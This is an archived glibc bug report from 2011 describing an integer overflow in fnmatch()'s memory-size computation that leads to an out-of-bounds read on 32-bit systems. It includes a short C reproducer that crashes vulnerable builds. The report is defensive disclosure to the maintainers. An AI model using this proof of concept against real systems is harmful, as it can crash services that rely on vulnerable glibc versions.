public inbox for glibc-bugs@sourceware.org help / color / mirror / Atom feed
From: "thoger at redhat dot com" <sourceware-bugzilla@sourceware.org> To: glibc-bugs@sources.redhat.com Subject: [Bug libc/12583] New: fnmatch: integer overflow in computation of the required memory Date: Mon, 14 Mar 2011 14:43:00 -0000 [thread overview] Message-ID: <bug-12583-131@http.sourceware.org/bugzilla/> (raw) http://sourceware.org/bugzilla/show_bug.cgi?id=12583 Summary: fnmatch: integer overflow in computation of the required memory Product: glibc Version: 2.13 Status: NEW Severity: normal Priority: P2 Component: libc AssignedTo: drepper.fsp@gmail.com ReportedBy: thoger@redhat.com Bug #11883 describes a problem of an unbound alloca() use in fnmatch(), leading to crash when unexpectedly long string is passed to fnmatch() as either pattern or string. The issue seems to have been addressed in the following commit: http://sourceware.org/git/?p=glibc.git;a=commitdiff;h=f15ce4d8 which makes fnmatch() use malloc() when arguments exceed certain length. That bug report does not explicitly mention integer overflow in malloc ((n + 1) * sizeof (wchar_t)), which got mentioned in reporter's blog post about the issue: http://scarybeastsecurity.blogspot.com/2011/02/i-got-accidental-code-execution-via.html That integer overflow was not addressed in the patch and with certain patterns, it's possible to trigger out-of-bounds read crash. The corner case is when n is 1073741823 / 0x3fffffff, (n + 1) * sizeof (wchar_t) is 0 on IA32, which usually causes malloc() to return non-NULL. string_end argument passed to internal_fnwmatch is computed as wstring + n, resulting in internal_fnwmatch being called with string > string_end. As some checks for end-of-string are done as n == string_end rather than n >= string_end, oob read may occur. I was able to trigger the crash on Fedora Rawhide glibc-2.13.90-3.i686 using the following modified version of the original reproducer: #include <err.h> #include <fnmatch.h> #include <locale.h> #include <stdlib.h> #include <string.h> #include <stdio.h> int main(int argc, const char* argv[]) { char *pat, *str; size_t pat_len = 1000000, str_len = 0x3fffffff; setlocale(LC_ALL, "en_US.UTF8"); if (argc > 1) str_len = atol(argv[1]); if (argc > 2) pat_len = atol(argv[2]); pat = malloc(pat_len + 1); str = malloc(str_len + 1); if (!pat || !str) errx(1, "malloc() failed."); memset(pat, '?', pat_len); pat[pat_len] = '\0'; memset(str, 'A', str_len); str[str_len] = '\0'; printf("running fnmatch(\"?\"x%zu, \"A\"x%zu, 0)...\n", pat_len, str_len); printf("return: %d\n", fnmatch(pat, str, 0)); return 0; } -- Configure bugmail: http://sourceware.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.
next reply other threads:[~2011-03-14 14:43 UTC|newest] Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top 2011-03-14 14:43 thoger at redhat dot com [this message] 2011-03-16 15:19 ` [Bug libc/12583] " thoger at redhat dot com 2011-03-18 9:31 ` drepper.fsp at gmail dot com 2014-06-27 13:44 ` [Bug libc/12583] fnmatch: integer overflow in computation of the required memory (CVE-2011-1659) fweimer at redhat dot com
Reply instructions: You may reply publicly to this message via plain-text email using any one of the following methods: * Save the following mbox file, import it into your mail client, and reply-to-all from there: mbox Avoid top-posting and favor interleaved quoting: https://en.wikipedia.org/wiki/Posting_style#Interleaved_style * Reply using the --to, --cc, and --in-reply-to switches of git-send-email(1): git send-email \ --in-reply-to=bug-12583-131@http.sourceware.org/bugzilla/ \ --to=sourceware-bugzilla@sourceware.org \ --cc=glibc-bugs@sources.redhat.com \ /path/to/YOUR_REPLY https://kernel.org/pub/software/scm/git/docs/git-send-email.html * If your mail client supports setting the In-Reply-To header via mailto: links, try the mailto: linkBe sure your reply has a Subject: header at the top and a blank line before the message body.
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox; as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).